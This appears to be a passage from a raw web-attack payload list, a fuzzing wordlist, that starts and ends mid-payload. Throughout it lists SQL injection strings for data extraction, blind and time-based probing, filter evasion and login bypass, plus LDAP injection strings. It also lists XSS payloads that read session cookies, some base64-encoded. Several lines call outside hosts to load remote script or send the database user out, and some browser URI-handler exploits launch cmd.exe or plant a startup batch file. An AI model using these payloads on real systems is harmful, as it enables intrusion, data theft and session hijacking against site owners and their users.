C%0A%23lZlmVvV%0ASELECT%23FHaHzAMzvN%0A%23BWRjqHuR%0A%23BTtMGfzKairL%0A%23GvGSlRR%0A%23kbCsPv%0A%23kiirXiLzYG%0A%23RkKvrFrkKc%0ACONCAT%280x3a6267653a%2C%23TLxyzUYCN%0A%23iKDnXTOMyUX%0AIFNULL%28%23KLWKJH%0ACAST%28%23EVVXxVJ%0A%23ddeBcXdPJNK%0A%23JytbHTOvwXC%0Aversion%28%29%23OXQNXTG%0A%23JqAzVQn%0A%23uYcIYOA%0A%23xBATyw%0AAS%23SuQdAyf%0A%23hQHYtT%0A%23ReByaH%0A%23COkovdqzzcS%0A%23nJrotVbdX%0ACHAR%23NklnJgTSwC%0A%23StUlDCtwD%0A%23EHSUPhSgYLrO%0A%29%2C0x20%29%2C0x3a69626b3a%29%23%20and%20%270having%27=%270having%27\n23%27%2BLIMIT%2B1%2C1%2BUNION%2BALL%2BSELECT%2BCONCAT%280x3a6267653a%2CIFNULL%28CAST%28version%28%29%2BAS%2BCHAR%29%2C0x20%29%2C0x3a69626b3a%29%23\n-123%27%2F%2A%210LIMIT%201%2C1%2F%2A%210UNION%2F%2A%210ALL%2F%2A%210SELECT%2F%2A%210CONCAT%280x3a6267653a%2C%2F%2A%210IFNULL%28CAST%28%2F%2A%210version%28%29%2F%2A%210AS%2F%2A%210CHAR%29%2C0x20%29%2C0x3a69626b3a%29%23\n-223%27%20%2F%2A%2130631LIMIT%201%2C1%20UNION%20ALL%20SELECT%20CONCAT%280x3a6267653a%2CIFNULL%28CAST%28version%28%29%20AS%20CHAR%29%2C0x20%29%2C0x3a69626b3a%29%2A%2F%2\n323%29%20%2F%2A%2100000AND%203244=4853%20AND%20%286013=6013%2A%2F\n423%27%20%2F%2A%2100000LIMIT%201%2C1%20UNION%20ALL%20SELECT%20CONCAT%280x3a6a7a713a%2CIFNULL%28CAST%28database%28%29%20AS%20CHAR%29%2C0x20%29%2C0x3a79757a3a%29%2A%2F%23\n523%27%2F%2A%21LIMIT%2A%2F1%2C1%2F%2A%21UNION%2A%2F%2F%2A%21ALL%2A%2F%2F%2A%21SELECT%2A%2F%2F%2A%21CONCAT%2A%2F%280x3a6a7a713a%2C%2F%2A%21IFNULL%2A%2F%28CAST%28%2F%2A%21database%2A%2F%28%29%2F%2A%21AS%2A%2F%2F%2A%21CHAR%2A%2F%29%2C0x20%29%2C0x3a79757a3a%29%23\n123%27%09LIMIT%0C1%2C1%0AUNION%04ALL%01SELECT%07CONCAT%280x3a6a7a713a%2CIFNULL%28CAST%28database%28%29%09AS%0BCHAR%29%2C0x20%29%2C0x3a79757a3a%29%23\n123%29%07AND%079869=8149%01AND%01%281045=1045\n1+and+1=1\n1+and+100>(ASCII(Substring(user(),1,1)))\n1+and+100>(Select+top+1+ASCII(Substring(name,1,1))) from sysusers)--\n1 and 100>(Select ASCII(Substr(username,1,1))) from all_users where rownum<=1)\n1 and substring(version(),1,1)=4\n+order+by+19--\n'1+and+'123'='123\n1'+or+@@servername=@@servername--\n1+and+ascii('a')=97\n1+and+hex('a')=61\n1+and+ord('a') = 97\n1 and name=0x5265696E657273\n1+and+len(@@servername)>1--\n1+and+length(123)=3\n123+AND+md5('a')!= md5('A')\nand (select 1)=1\n123'+not+like+'1234\n'aaa'<>'bbb'\n'+or+round(pi(),1)+true+true = version()\n+or+round(pi(),1)+true+true = version()\n'+where+(0)=0\n+where 0 = 0\n1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1))\n1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74\n123%20or%20%c0%a7%c01%a71=%c0%a71\n123K29yKycxJz0nMQ==\ncase when name=0x5265696E657273 then 1 else 0 end\n123+1+5-5-1\n123+len(1234)-len(123)\n23+len(@@servername)-len(@@servername)\n')+waitfor+delay+'0:0:5'\n');waitfor+delay+'00:00:05'\n';waitfor+delay+'00:00:05'\n');waitfor+delay+'00:00:05'--\n');waitFor+Delay+'00:00:05'\n'waitfor+delay+'00:00:05'\n')+waitfor+delay+'00:00:05'\n'+waitfor+delay+'00:00:05'--\n'+waitfor+delay+'00:00:05'\n+waitfor+delay+'00:00:05'\n')+waitfor+time+'00:00:01'\n';waitfor+delay+'0:0:5'--\n';waitfor+delay+'0:0:5'--\nBENCHMARK(1000000000,MD5(CHAR(116)))\nIF(SUBSTRING(USER(),1,4)=0x726f6f74,SLEEP(5),1)\n' UNION SELECT IF(SUBSTRING(USER(),1,4)=0x726f6f74,BENCHMARK(100000000,RAND()),1)\n+if(ASCII(SUBSTRING((),i, 1))>k,BENCHMARK(100000000, RAND()),1)\n'%20AND%20SLEEP(10)='\n'||UTL_HTTP.REQUEST('http://somehost/')||'\n'||utl_inaddr.get_host_name((select+user+from+dual))\n'+or+1=utl_http.request('http://host/'||(select+user+from+dual))--\nadmin' --  \nadmin' #  \nadmin'/*  \n' or 1=1--  \n' or 1=1#  \n' or 1=1/*  \n') or '1'='1--  \n') or ('1'='1--\n' OR '1'='1' --\n' OR '1'='1' /*\n' OR '1'='1' #\n' OR '1'='1' %00\n' OR '1'='1' %16\nOR 1=1\nOR 1=0\nOR x=x\nOR x=y\nOR 1=1#\nOR 1=0#\nOR x=x#\nOR x=y#\nOR 1=1-- \nOR 1=0-- \nOR x=x-- \nOR x=y-- \nOR 3409=3409 AND ('pytW' LIKE 'pytW\nOR 3409=3409 AND ('pytW' LIKE 'pytY\nHAVING 1=1\nHAVING 1=0\nHAVING 1=1#\nHAVING 1=0#\nHAVING 1=1-- \nHAVING 1=0-- \nAND 1=1\nAND 1=0\nAND 1=1-- \nAND 1=0-- \nAND 1=1#\nAND 1=0#\nAND 1=1 AND '%'='\nAND 1=0 AND '%'='\nAND 1083=1083 AND (1427=1427\nAND 7506=9091 AND (5913=5913\nAND 1083=1083 AND ('1427=1427\nAND 7506=9091 AND ('5913=5913\nAND 7300=7300 AND 'pKlZ'='pKlZ\nAND 7300=7300 AND 'pKlZ'='pKlY\nAND 7300=7300 AND ('pKlZ'='pKlZ\nAND 7300=7300 AND ('pKlZ'='pKlY\nAS INJECTX WHERE 1=1 AND 1=1\nAS INJECTX WHERE 1=1 AND 1=0\nAS INJECTX WHERE 1=1 AND 1=1#\nAS INJECTX WHERE 1=1 AND 1=0#\nAS INJECTX WHERE 1=1 AND 1=1--\nAS INJECTX WHERE 1=1 AND 1=0--\nWHERE 1=1 AND 1=1\nWHERE 1=1 AND 1=0 \nWHERE 1=1 AND 1=1#\nWHERE 1=1 AND 1=0#\nWHERE 1=1 AND 1=1--\nWHERE 1=1 AND 1=0--\nORDER BY 1-- \nORDER BY 2-- \nORDER BY 3-- \nORDER BY 4-- \nORDER BY 5-- \nORDER BY 6-- \nORDER BY 7-- \nORDER BY 8-- \nORDER BY 9-- \nORDER BY 10-- \nORDER BY 11-- \nORDER BY 12-- \nORDER BY 13-- \nORDER BY 14-- \nORDER BY 15-- \nORDER BY 16-- \nORDER BY 17-- \nORDER BY 18-- \nORDER BY 19-- \nORDER BY 20-- \nORDER BY 21-- \nORDER BY 22-- \nORDER BY 23-- \nORDER BY 24-- \nORDER BY 25-- \nORDER BY 26-- \nORDER BY 27-- \nORDER BY 28-- \nORDER BY 29-- \nORDER BY 30-- \nORDER BY 31337-- \nORDER BY 1# \nORDER BY 2# \nORDER BY 3# \nORDER BY 4# \nORDER BY 5# \nORDER BY 6# \nORDER BY 7# \nORDER BY 8# \nORDER BY 9# \nORDER BY 10# \nORDER BY 11# \nORDER BY 12# \nORDER BY 13# \nORDER BY 14# \nORDER BY 15# \nORDER BY 16# \nORDER BY 17# \nORDER BY 18# \nORDER BY 19# \nORDER BY 20# \nORDER BY 21# \nORDER BY 22# \nORDER BY 23# \nORDER BY 24# \nORDER BY 25# \nORDER BY 26# \nORDER BY 27# \nORDER BY 28# \nORDER BY 29# \nORDER BY 30#\nORDER BY 31337#\nORDER BY 1 \nORDER BY 2 \nORDER BY 3 \nORDER BY 4 \nORDER BY 5 \nORDER BY 6 \nORDER BY 7 \nORDER BY 8 \nORDER BY 9 \nORDER BY 10 \nORDER BY 11 \nORDER BY 12 \nORDER BY 13 \nORDER BY 14 \nORDER BY 15 \nORDER BY 16 \nORDER BY 17 \nORDER BY 18 \nORDER BY 19  \nORDER BY 20 \nORDER BY 21 \nORDER BY 22 \nORDER BY 23 \nORDER BY 24 \nORDER BY 25 \nORDER BY 26 \nORDER BY 27 \nORDER BY 28 \nORDER BY 29 \nORDER BY 30 \nORDER BY 31337 \nRLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='\nRLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='\nIF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--\nIF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--\n%' AND 8310=8310 AND '%'='\n%' AND 8310=8311 AND '%'='\nand (select substring(@@version,1,1))='X'\nand (select substring(@@version,1,1))='M'\nand (select substring(@@version,2,1))='i'\nand (select substring(@@version,2,1))='y'\nand (select substring(@@version,3,1))='c'\nand (select substring(@@version,3,1))='S'\nand (select substring(@@version,3,1))='X'\nadmin)(|(password=*)\nadmin)(%0a|(password=*)\n%0a*{}%0abody{background:red}%0a/\n'';!--\"<XSS>=&{()}\n\\\"><script>alert(0x000123)</script>\n\\\"><sCriPt>alert(0x000123)</sCriPt>\n\\\"; alert(0x000123)\n\\\"></sCriPt><sCriPt >alert(0x000123)</sCriPt>\n\\\"><img Src=0x94 onerror=alert(0x000123)>\n\\\"><BODY ONLOAD=alert(0x000123)>\n'%2Balert(0x000123)%2B'\n\\\"><0x000123>\n'+alert(0x000123)+'\n%2Balert(0x000123)%2B'\n'\\\"--></style></script><script>alert(0x000123)</script>\n'</style></script><script>alert(0x000123)</script>\n</script><script>alert(0x000123)</script>\n</style></script><script>alert(0x000123)</script>\n%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3E0x94(0x000123)%3C\n'\\\"--></style></script><script>alert(0x000123)</script>\n';alert(0x000123)'\n<scr<script>ipt>alert(0x000123)</script>\n<scr<script>ipt>alert(0x000123)</scr</script>ipt>\n\\\"<scr<script>ipt>alert(0x000123)</scr</script>ipt>\n\\\"><scr<script>ipt>alert(0x000123)</script>\n\\\">'</style></script><script>alert(0x000123)</script>\n\\\"></script><script>alert(0x000123)</script>\n\\\"></style></script><script>alert(0x000123)</script>  \naim: &c:\\windows\\system32\\calc.exe\" ini=\"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat\"\nfirefoxurl:test|\"%20-new-window%20javascript:alert(\\'Cross%2520Browser%2520Scripting!\\');\"\nnavigatorurl:test\" -chrome \"javascript:C=Components.classes;I=Components.interfaces;file=C[\\'@mozilla.org/file/local;1\\'].createInstance(I.nsILocalFile);file.initWithPath(\\'C:\\'+String.fromCharCode(92)+String.fromCharCode(92)+\\'Windows\\'+String.fromCharCode(92)+String.fromCharCode(92)+\\'System32\\'+String.fromCharCode(92)+String.fromCharCode(92)+\\'cmd.exe\\');process=C[\\'@mozilla.org/process/util;1\\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)\nres://c:\\\\program%20files\\\\adobe\\\\acrobat%207.0\\\\acrobat\\\\acrobat.dll/#2/#210\n'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E\n<<scr\\0ipt/src=http://xss.com/xss.js></script\n%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E\n' onmouseover=alert(/Black.Spook/)\n\"><iframe%20src=\"http://google.com\"%%203E\n'<script>window.onload=function(){document.forms[0].message.value='1';}</script>\nx”</title><img src%3dx onerror%3dalert(1)>\n<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>\n<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>\n<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>\n<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>\n<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>\n<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>\n<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>\n<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>\n<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>\n<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22);  xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{   var c;   if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) )    alert(c[1]); }catch(e){} };  xdr.send(); </script>\n<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() {    return document.cookie }}); alert(Safe.get());</script>\n<script>alert(document.head.innerHTML.substr(146,20));</script>\n<script>alert(document.head.childNodes[3].text)</script>\n<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>\n<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>\n<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%22)};document.body.appendChild(x);</script>\n<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\\/script>%22)};document.body.appendChild(x);</script>\n<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>\n<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>\n<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click';  document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>\n<script>  (function (o) {   function exploit(x) {    if (x !== null)     alert('User cookie is ' %2B x);    else     console.log('fail');   }      o.onclick = function (e) {    e.__defineGetter__('isTrusted', function () { return true; });    exploit(Safe.get());   };      var e = document.createEvent('MouseEvent');   e.initEvent('click', true, true);   o.dispatchEvent(e);  })(document.getElementById('safe123')); </script>\n<iframe src=/ onload=eval(unescape(this.name.replace(/\\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>\n<script>     function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> \n<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #\n<script>  function foo(elem, doc, text) {   elem.onclick = function (e) {    e.__defineGetter__(text[0], function () { return true })    alert(Safe.get());   };      var event = doc.createEvent(text[1]);   event.initEvent(text[2], true, true);   elem.dispatchEvent(event);  } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # \n<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#\n<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#\n<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23\n<script for=document event=onreadystatechange>getElementById('safe123').click()</script>\n<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>\n<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>\n<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\\/script>%26quot;)%22></iframe>\n<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#\n<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>\n<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\\/script%26gt;\\%26quot;%26quot;) autofocus></textarea>\n<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>\n<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>\n<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>\n<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E\n<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>\n<a target=\"x\" href=\"xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E\n<a target=\"x\" href=\"xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>\n<a target=\"x\" href=\"xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>\n<a target=\"x\" href=\"xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\nGarethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>\n<a href=\"javascript&colon;\\u0061&#x6C;&#101%72t&lpar;1&rpar;\"><button>\n<div onmouseover='alert&lpar;1&rpar;'>DIV</div>\n<iframe style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\">\n<a href=\"jAvAsCrIpT&colon;alert&lpar;1&rpar;\">X</a>\n<embed src=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\"> ?\n<object data=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">?\n<var onmouseover=\"prompt(1)\">On Mouse Over</var>?\n<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>\n<img src=\"/\" =_=\" title=\"onerror='prompt(1)'\">\n<%<!--'%><script>alert(1);</script -->\n<script src=\"data:text/javascript,alert(1)\"></script>\n<iframe/src \\/\\/onload = prompt(1)\n<iframe/onreadystatechange=alert(1)\n<svg/onload=alert(1)\n<input value=<><iframe/src=javascript:confirm(1)\n<input type=\"text\" value=``<div/onmouseover='alert(1)'>X</div>\nhttp://www.<script>alert(1)</script .com\n<iframe  src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&